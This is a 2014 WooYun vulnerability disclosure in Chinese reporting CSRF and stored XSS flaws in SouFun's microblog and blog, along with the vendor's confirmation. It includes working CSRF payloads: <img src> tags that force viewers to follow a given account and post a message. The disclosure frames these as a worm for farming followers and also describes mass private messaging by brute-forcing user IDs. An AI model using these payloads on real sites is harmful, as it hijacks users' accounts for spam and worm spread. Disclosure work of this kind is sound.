当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061534

漏洞标题:搜房网微博多处安全漏洞礼包

相关厂商:搜房网

漏洞作者: 小威

提交时间:2014-06-03 12:00

修复时间:2014-07-18 12:01

公开时间:2014-07-18 12:01

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-03: 细节已通知厂商并且等待厂商处理中
2014-06-03: 厂商已经确认,细节仅向厂商公开
2014-06-13: 细节向核心白帽子及相关领域专家公开
2014-06-23: 细节向普通白帽子公开
2014-07-03: 细节向实习白帽子公开
2014-07-18: 细节向公众公开

简要描述:

RT-这应该是叫做csrf的!

详细说明:

1.搜房微博发微处,发条微博抓包!
此处

http://t.soufun.com/post_add.php?&post_content=这里是内容
&andComment=&toweibo=&oldComment=&pic_path=&7910560603827216


直接为get数据提交,无任何验证设置。
2.抓包“关注”同样得到get数据包!

http://t.soufun.com/follow_add.php?follow_id=此处为注册用户ID&iframe=1&random=0.7860255646232082


3.猥琐的想到此处可以蠕虫刷粉丝 -.-!
4.首先得有施展的地方!于是一番转悠。发现论坛发帖和回帖可以发图,我们就可以找一些流量人气比较大的论坛,在发图时候以<img src>将get数据载入来实现我们的目的!

<img src="http://t.soufun.com/follow_add.php?follow_id=46661553&amp;iframe=1&amp;random=0.9105442526532137;" modifysize="36%" diffpixels="3px" style="width: 23px; height: 25px;">
<img src="http://t.soufun.com/post_add.php?&amp;post_content=%B5%F0%B1%AC%C1%CB%A3%AC%C1%C1%CF%B9%C1%CB%CE%D2%B5%C4%32%34%4B%EB%B4%20%BD%F0%B9%B7%D1%DB%68%74%74%70%3A%2F%2F%6A%69%6E%74%61%69%6C%69%73%68%65%2E%73%6F%75%66%75%6E%2E%63%6F%6D%2F%62%62%73%2F%31%30%31%30%37%33%37%30%34%39%7E%2D%31%2F%31%38%36%30%35%36%31%39%37%5F%31%38%36%30%35%36%31%39%37%5F%32%2E%68%74%6D%D5%E2%BE%B9%C8%BB%CA%C7%40%D3%EE%D6%E6%B5%DA%D2%BB%B4%F3%CB%A7%B8%E7&amp;andComment=&amp;toweibo=&amp;oldComment=&amp;pic_path=&amp;7990988821018783;" modifysize="115%" diffpixels="30px" style="width: 20px; height: 23px;">


03.jpg


04.jpg


5.更猥琐的方式.. 抓包私信功能,是同样的get数据包

http://t.soufun.com/pm_add.php?&pm_content=这里是内容&reader_uid=这里是用户ID&reader_name=&695832881602396


6.祭出神器burp,通过对ID的1~N的爆破,来实现群发私信!

burp.jpg


7.看下刷蠕虫和刷粉的效果!刚刚动起来~~

01.jpg

漏洞证明:

接上面继续来,因为问题太罗嗦,索性一次性打包都发了吧!估计给个高Rank还是值得!
搜房博客有两处XSS跨站。
0.1 个人资料处存储型XSS.

001个人.jpg


未进行任何过滤,所以打开博客后出现XSS
证明:

002个人真名.jpg


0.2 文章分类处存储型XSS.
此处有对script过滤,但可绕过继续进行XSS

01分类.jpg


证明:

02分类证明.jpg


QQ截图20140603115049.jpg

修复方案:

token

版权声明:转载请注明来源 小威@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-06-03 14:55

厂商回复:

感谢您对搜房安全的关注,您发现的问题已经安排技术人员修复。

最新状态:

暂无